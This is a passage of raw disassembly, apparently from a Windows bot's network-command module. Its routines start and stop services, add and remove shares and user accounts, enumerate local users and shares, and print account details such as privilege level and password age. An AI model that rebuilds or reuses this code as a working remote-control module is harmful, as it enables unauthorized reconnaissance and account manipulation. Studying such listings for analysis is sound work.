jmp short loc_406FB7
; ---------------------------------------------------------------------------
loc_406FA4: ; CODE XREF: sub_406EE3+8D�j
push offset aStoping ; " Stoping"
jmp short loc_406FB7
; ---------------------------------------------------------------------------
loc_406FAB: ; CODE XREF: sub_406EE3+8A�j
push offset aStarting ; " Starting"
jmp short loc_406FB7
; ---------------------------------------------------------------------------
loc_406FB2: ; CODE XREF: sub_406EE3+87�j
push offset aStopped ; " Stopped"
loc_406FB7: ; CODE XREF: sub_406EE3+B1�j
; sub_406EE3+B8�j ...
lea eax, [ebp+var_20]
loc_406FBA: ; CODE XREF: sub_406EE3+A3�j
; sub_406EE3+AA�j
push eax
call sub_4145E5
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_4145E5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_406F66
loc_407003: ; CODE XREF: sub_406EE3+77�j
cmp [ebp+var_8], ebx
jnz loc_406F1B
loc_40700C: ; CODE XREF: sub_406EE3+6C�j
push [ebp+var_C]
call dword_435818 ; CloseServiceHandle
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_406EE3 endp
; =============== S U B R O U T I N E =======================================
sub_407023 proc near ; CODE XREF: sub_4070E5+A�p
; sub_4070E5+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_407030
pop ebp
retn
; ---------------------------------------------------------------------------
loc_407030: ; CODE XREF: sub_407023+9�j
push ebx
push esi
mov esi, ds:dword_4200D4
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_4155FE
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_407023 endp
; =============== S U B R O U T I N E =======================================
sub_407064 proc near ; CODE XREF: sub_40FF1B+248�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset loc_41FB9D
call sub_415A60
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_40707B
xor eax, eax
jmp short loc_4070D7
; ---------------------------------------------------------------------------
loc_40707B: ; CODE XREF: sub_407064+11�j
push ebx
loc_40707C: ; DATA XREF: .data:0042CC5C�o
; .data:0042CC70�o ...
push ebp
push edi
mov edi, ds:dword_4200D8
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr dword_435C08, 1
mov ebp, eax
jnz short loc_4070BC
or dword_435C08, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_4155FE
pop ecx
mov dword_435C04, eax
loc_4070BC: ; CODE XREF: sub_407064+3C�j
push esi
push esi
push ebp
push dword_435C04
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_435C04
pop edi
pop ebp
pop ebx
loc_4070D7: ; CODE XREF: sub_407064+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_407064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4070E5 proc near ; CODE XREF: sub_407820+6C�p
; sub_410242+18F�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_407023
push [ebp+arg_4]
mov edi, eax
call sub_407023
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_415A90
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_407023
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_4357D0
pop edi
leave
retn
sub_4070E5 endp
; =============== S U B R O U T I N E =======================================
sub_407150 proc near ; CODE XREF: sub_407820+20�p
; sub_40FF1B+1BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_407023
push [esp+8+arg_4]
mov esi, eax
call sub_407023
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4357EC
pop esi
retn
sub_407150 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407173 proc near ; CODE XREF: sub_4079FD+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_407023
push [ebp+arg_4]
mov edi, eax
call sub_407023
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_407023
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_4357B4
pop edi
leave
retn
sub_407173 endp
; =============== S U B R O U T I N E =======================================
sub_4071CD proc near ; CODE XREF: sub_4079FD+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_407023
push [esp+8+arg_4]
mov esi, eax
call sub_407023
pop ecx
pop ecx
push eax
push esi
call dword_4358B0
pop esi
retn
sub_4071CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071EE proc near ; CODE XREF: sub_4079FD+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_407023
push [ebp+arg_4]
mov esi, eax
call sub_407023
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_4357D4
test eax, eax
mov [ebp+var_8], eax
jnz loc_40757B
mov eax, [ebp+var_4]
test eax, eax
jz loc_4075B6
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_4145E5
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_407307
dec eax
jz short loc_407300
dec eax
jz short loc_4072F9
mov eax, offset aUnknown ; "Unknown"
jmp short loc_40730C
; ---------------------------------------------------------------------------
loc_4072F9: ; CODE XREF: sub_4071EE+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_40730C
; ---------------------------------------------------------------------------
loc_407300: ; CODE XREF: sub_4071EE+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_40730C
; ---------------------------------------------------------------------------
loc_407307: ; CODE XREF: sub_4071EE+FC�j
mov eax, offset aGuest ; "Guest"
loc_40730C: ; CODE XREF: sub_4071EE+109�j
; sub_4071EE+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_4145E5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4056FB
add esp, 20h
pop edi
pop ebx
jmp short loc_4075A7
; ---------------------------------------------------------------------------
loc_40757B: ; CODE XREF: sub_4071EE+35�j
push eax
lea eax, [ebp+var_208]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_4145E5
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4056FB
add esp, 20h
loc_4075A7: ; CODE XREF: sub_4071EE+38B�j
cmp [ebp+var_4], 0
jz short loc_4075B6
push [ebp+var_4]
call dword_435820
loc_4075B6: ; CODE XREF: sub_4071EE+40�j
; sub_4071EE+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_4071EE endp
; =============== S U B R O U T I N E =======================================
sub_4075BC proc near ; CODE XREF: sub_4076EC+9E�p
; sub_407820:loc_407860�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_40766A
jz loc_407663
cmp eax, 7Bh
ja short loc_40762F
jz short loc_407625
cmp eax, 5
jz short loc_40761B
cmp eax, 8
jz short loc_407611
cmp eax, 32h
jz short loc_407607
cmp eax, 35h
jz short loc_4075FD
cmp eax, 57h
jnz loc_4076B9
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_4075FD: ; CODE XREF: sub_4075BC+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_407607: ; CODE XREF: sub_4075BC+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_407611: ; CODE XREF: sub_4075BC+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_40761B: ; CODE XREF: sub_4075BC+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_407625: ; CODE XREF: sub_4075BC+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_40762F: ; CODE XREF: sub_4075BC+16�j
sub eax, 7Ch
jz short loc_40765C
sub eax, 7C8h
jz short loc_407655
dec eax
jz short loc_40764B
dec eax
jnz short loc_4076B9
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_40764B: ; CODE XREF: sub_4075BC+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_4076DA
; ---------------------------------------------------------------------------
loc_407655: ; CODE XREF: sub_4075BC+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_40765C: ; CODE XREF: sub_4075BC+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_407663: ; CODE XREF: sub_4075BC+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_40766A: ; CODE XREF: sub_4075BC+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_4076A3
jz short loc_40769C
sub eax, 8ADh
jz short loc_4076CE
dec eax
dec eax
jz short loc_407695
dec eax
jz short loc_40768E
dec eax
dec eax
jnz short loc_4076B9
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_40768E: ; CODE XREF: sub_4075BC+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_407695: ; CODE XREF: sub_4075BC+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_40769C: ; CODE XREF: sub_4075BC+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_4076A3: ; CODE XREF: sub_4075BC+B5�j
sub eax, 8CAh
jz short loc_4076D5
sub eax, 17h
jz short loc_4076CE
sub eax, 25h
jz short loc_4076C7
sub eax, 29h
jz short loc_4076C0
loc_4076B9: ; CODE XREF: sub_4075BC+31�j
; sub_4075BC+83�j ...
push offset aAnUnknownError ; "An unknown error occurred."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_4076C0: ; CODE XREF: sub_4075BC+FB�j
push offset aTheComputerNam ; "The computer name is invalid."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_4076C7: ; CODE XREF: sub_4075BC+F6�j
push offset aShareNotFound_ ; "Share not found."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_4076CE: ; CODE XREF: sub_4075BC+BE�j
; sub_4075BC+F1�j
push offset aTheUserNameCou ; "The user name could not be found."
jmp short loc_4076DA
; ---------------------------------------------------------------------------
loc_4076D5: ; CODE XREF: sub_4075BC+EC�j
push offset aNetworkConnect ; "Network connection not found."
loc_4076DA: ; CODE XREF: sub_4075BC+3C�j
; sub_4075BC+46�j ...
push offset dword_435C10
call sub_4145E5
pop ecx
pop ecx
mov eax, offset dword_435C10
retn
sub_4075BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4076EC proc near ; CODE XREF: sub_408A18+1E24�p
var_71C = byte ptr -71Ch
var_31C = byte ptr -31Ch
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 71Ch
push esi
push 200h
push [ebp+arg_0]
lea eax, [ebp+var_71C]
push eax
call sub_415C5A
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
mov esi, 108h
push eax
mov [ebp+var_4], esi
call ds:dword_4200DC ; GetComputerNameA
push esi
lea eax, [ebp+var_10C]
push eax
lea eax, [ebp+var_31C]
push eax
call sub_415C5A
lea eax, [ebp+var_71C]
push eax
call sub_415B4E
add esp, 10h
shl eax, 1
push eax
lea eax, [ebp+var_71C]
push eax
push 0
lea eax, [ebp+var_31C]
push eax
push 0
call dword_4357FC
test eax, eax
jnz short loc_40777C
push offset aNetMessageSent ; "[NET]: Message sent successfully."
mov esi, offset dword_435C70
push esi
call sub_4145E5
pop ecx
pop ecx
jmp short loc_4077A3
; ---------------------------------------------------------------------------
loc_40777C: ; CODE XREF: sub_4076EC+7A�j
lea ecx, [ebp+var_71C]
push ecx
lea ecx, [ebp+var_31C]
push ecx
call sub_4075BC
push eax
push offset aNetSServerSMes ; "[NET]: %s <Server: %S> <Message: %S>"
mov esi, offset dword_435C70
push esi
call sub_4145E5
add esp, 14h
loc_4077A3: ; CODE XREF: sub_4076EC+8E�j
mov eax, esi
pop esi
leave
retn
sub_4076EC endp
; =============== S U B R O U T I N E =======================================
sub_4077A8 proc near ; CODE XREF: sub_408A18:loc_40A63F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_4077FE
push 0
lea esi, [eax+eax*2]
push 0
shl esi, 2
push dword_42B478[esi]
push edi
push eax
call sub_406CC7
add esp, 14h
test eax, eax
jnz short loc_4077F0
push edi
push off_42B474[esi]
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
loc_4077E0: ; CODE XREF: sub_4077A8+54�j
mov esi, offset dword_435E70
push esi
call sub_4145E5
add esp, 10h
jmp short loc_40781B
; ---------------------------------------------------------------------------
loc_4077F0: ; CODE XREF: sub_4077A8+2A�j
call sub_406D69
push eax
push edi
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
jmp short loc_4077E0
; ---------------------------------------------------------------------------
loc_4077FE: ; CODE XREF: sub_4077A8+C�j
lea eax, [eax+eax*2]
push off_42B470[eax*4]
mov esi, offset dword_435E70
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_4145E5
add esp, 0Ch
loc_40781B: ; CODE XREF: sub_4077A8+46�j
pop edi
mov eax, esi
pop esi
retn
sub_4077A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407820 proc near ; CODE XREF: sub_408A18:loc_40A723�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_4]
test edi, edi
jz loc_4078B8
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, 0
jz short loc_407849
dec eax
jnz short loc_407898
push edi
push 0
call sub_407150
pop ecx
pop ecx
jmp short loc_407894
; ---------------------------------------------------------------------------
loc_407849: ; CODE XREF: sub_407820+18�j
cmp [ebp+arg_8], 0
jnz short loc_407886
push 24h
push edi
call sub_415A90
test eax, eax
pop ecx
pop ecx
jnz short loc_407886
push 57h
pop eax
loc_407860: ; CODE XREF: sub_407820+76�j
call sub_4075BC
push eax
push edi
lea eax, [esi+esi*2]
push off_42B470[eax*4]
mov esi, offset dword_436070
push offset aNetSErrorWithS ; "[NET]: %s: Error with share: '%s'. %s"
push esi
call sub_4145E5
add esp, 14h
jmp short loc_4078D8
; ---------------------------------------------------------------------------
loc_407886: ; CODE XREF: sub_407820+2D�j
; sub_407820+3B�j
push [ebp+arg_8]
push edi
push 0
call sub_4070E5
add esp, 0Ch
loc_407894: ; CODE XREF: sub_407820+27�j
test eax, eax
jnz short loc_407860
loc_407898: ; CODE XREF: sub_407820+1B�j
push edi
lea eax, [esi+esi*2]
push off_42B474[eax*4]
mov esi, offset dword_436070
push offset aNetSShareS_ ; "[NET]: %s share: '%s'."
push esi
call sub_4145E5
add esp, 10h
jmp short loc_4078D8
; ---------------------------------------------------------------------------
loc_4078B8: ; CODE XREF: sub_407820+A�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42B470[eax*4]
mov esi, offset dword_436070
push offset aNetSNoShareSpe ; "[NET]: %s: No share specified."
push esi
call sub_4145E5
add esp, 0Ch
loc_4078D8: ; CODE XREF: sub_407820+64�j
; sub_407820+96�j
pop edi
mov eax, esi
pop esi
pop ebp
retn
sub_407820 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078DE proc near ; CODE XREF: sub_408A18+1D38�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push ebx
push esi
push edi
push [ebp+arg_C]
call sub_407023
xor esi, esi
push esi
push [ebp+arg_8]
mov [ebp+var_10], eax
push offset aShareNameResou ; "Share name: Resource: "...
push [ebp+arg_4]
mov [ebp+var_4], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_C], esi
call sub_4056FB
add esp, 18h
loc_407917: ; CODE XREF: sub_4078DE+10D�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_8]
push eax
push 1F6h
push [ebp+var_10]
call dword_4358E8
mov ebx, eax
cmp ebx, esi
jz short loc_407978
cmp ebx, 0EAh
jz short loc_407978
push ebx
call sub_4075BC
push eax
lea eax, [ebp+var_214]
push offset aNetShareListEr ; "[NET]: Share list error: %s <%ld>"
push eax
call sub_4145E5
push esi
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 24h
jmp short loc_4079E5
; ---------------------------------------------------------------------------
loc_407978: ; CODE XREF: sub_4078DE+5D�j
; sub_4078DE+65�j
xor edi, edi
inc edi
cmp [ebp+var_4], edi
jb short loc_4079DC
mov esi, [ebp+var_8]
add esi, 14h
loc_407986: ; CODE XREF: sub_4078DE+FA�j
push dword ptr [esi+10h]
call dword_4358E0 ; IsValidSecurityDescriptor
test eax, eax
mov eax, offset aYes ; "Yes"
jnz short loc_40799D
mov eax, offset aNo ; "No"
loc_40799D: ; CODE XREF: sub_4078DE+B8�j
push eax
push dword ptr [esi]
lea eax, [ebp+var_214]
push dword ptr [esi+4]
push dword ptr [esi-14h]
push offset a14s24s6u4s ; "%-14S %-24S %-6u %-4s"
push eax
call sub_4145E5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_214]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056FB
add esp, 2Ch
add esi, 28h
inc edi
cmp edi, [ebp+var_4]
jbe short loc_407986
xor esi, esi
loc_4079DC: ; CODE XREF: sub_4078DE+A0�j
push [ebp+var_8]
call dword_435820
loc_4079E5: ; CODE XREF: sub_4078DE+98�j
cmp ebx, 0EAh
jz loc_407917
xor eax, eax
cmp ebx, esi
pop edi
pop esi
setz al
pop ebx
leave
retn
sub_4078DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4079FD proc near ; CODE XREF: sub_408A18:loc_40A7C5�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
xor edi, edi
cmp ebx, edi
jz loc_407AA0
mov esi, [ebp+arg_0]
mov eax, esi
sub eax, edi
jz short loc_407A3F
dec eax
jz short loc_407A34
dec eax
jnz short loc_407A5A
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push ebx
push edi
call sub_4071EE
add esp, 14h
jmp short loc_407A56
; ---------------------------------------------------------------------------
loc_407A34: ; CODE XREF: sub_4079FD+1D�j
push ebx
push edi
call sub_4071CD
pop ecx
pop ecx
jmp short loc_407A56
; ---------------------------------------------------------------------------
loc_407A3F: ; CODE XREF: sub_4079FD+1A�j
cmp [ebp+arg_8], edi
jz short loc_407A53
push [ebp+arg_8]
push ebx
push edi
call sub_407173
add esp, 0Ch
jmp short loc_407A56
; ---------------------------------------------------------------------------
loc_407A53: ; CODE XREF: sub_4079FD+45�j
push 57h
pop eax
loc_407A56: ; CODE XREF: sub_4079FD+35�j
; sub_4079FD+40�j ...
cmp eax, edi
jnz short loc_407A7A
loc_407A5A: ; CODE XREF: sub_4079FD+20�j
push ebx
lea eax, [esi+esi*2]
push off_42B474[eax*4]
mov esi, offset dword_436270
push offset aNetSUsernameS_ ; "[NET]: %s username: '%s'."
push esi
call sub_4145E5
add esp, 10h
jmp short loc_407AC0
; ---------------------------------------------------------------------------
loc_407A7A: ; CODE XREF: sub_4079FD+5B�j
call sub_4075BC
push eax
push ebx
lea eax, [esi+esi*2]
push off_42B470[eax*4]
mov esi, offset dword_436270
push offset aNetSErrorWithU ; "[NET]: %s: Error with username: '%s'. %"...
push esi
call sub_4145E5
add esp, 14h
jmp short loc_407AC0
; ---------------------------------------------------------------------------
loc_407AA0: ; CODE XREF: sub_4079FD+D�j
mov eax, [ebp+arg_0]
lea eax, [eax+eax*2]
push off_42B470[eax*4]
mov esi, offset dword_436270
push offset aNetSNoUsername ; "[NET]: %s: No username specified."
push esi
call sub_4145E5
add esp, 0Ch
loc_407AC0: ; CODE XREF: sub_4079FD+7B�j
; sub_4079FD+A1�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
sub_4079FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407AC7 proc near ; CODE XREF: sub_408A18+1DDA�p
var_21C = byte ptr -21Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
push [ebp+arg_C]
xor esi, esi
mov [ebp+var_4], esi
call sub_407023
push esi
push [ebp+arg_8]
mov [ebp+var_18], eax
push offset aUsernameAccoun ; "Username accounts for local system:"
push [ebp+arg_4]
mov [ebp+var_8], esi
push [ebp+arg_0]
mov [ebp+var_14], esi
mov [ebp+var_1C], esi
mov [ebp+var_C], esi
call sub_4056FB
add esp, 18h
push ebx
loc_407B06: ; CODE XREF: sub_407AC7+129�j
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
push 2
push esi
push [ebp+var_18]
call dword_4357C8
cmp eax, esi
mov [ebp+var_10], eax
jz short loc_407B65
cmp eax, 0EAh
jz short loc_407B65
push eax
